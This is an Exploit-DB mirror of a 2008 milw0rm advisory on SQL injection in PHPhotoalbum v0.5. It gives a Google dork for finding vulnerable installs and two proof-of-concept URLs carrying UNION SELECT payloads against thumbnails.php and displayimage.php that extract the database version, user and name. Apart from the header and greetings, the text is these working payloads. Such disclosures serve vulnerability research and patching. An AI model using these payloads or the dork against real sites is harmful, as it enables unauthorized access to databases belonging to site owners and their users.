exploit-db-mirror/exploits/php/webapps/5683.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

23 lines
No EOL
876 B
Text

###############################################################################
#
# Name : PHPhotoalbum v0.5 Multiple Remote SQL Injection Vulnerabilities
# Author : cOndemned
# Dork : intext:PHPhotoalbum v0.5
# Greetz : ZaBeaTy, str0ke, TBH, Hawk, doctor, Sandtalker, Avantura ;**
#
###############################################################################
Proof of Concept :
http://[host]/[path]/thumbnails.php?album=-1+union+select+concat_ws(0x10,now(),version(),user(),database())/*
http://[host]/[path]/displayimage.php?pid=-1+union+select+1,2,3,now(),version(),user()/*
###############################################################################
#
# Together we stand tall, Not gonna crash, not gonna fall - Children of Bodom
#
###############################################################################
# milw0rm.com [2008-05-28]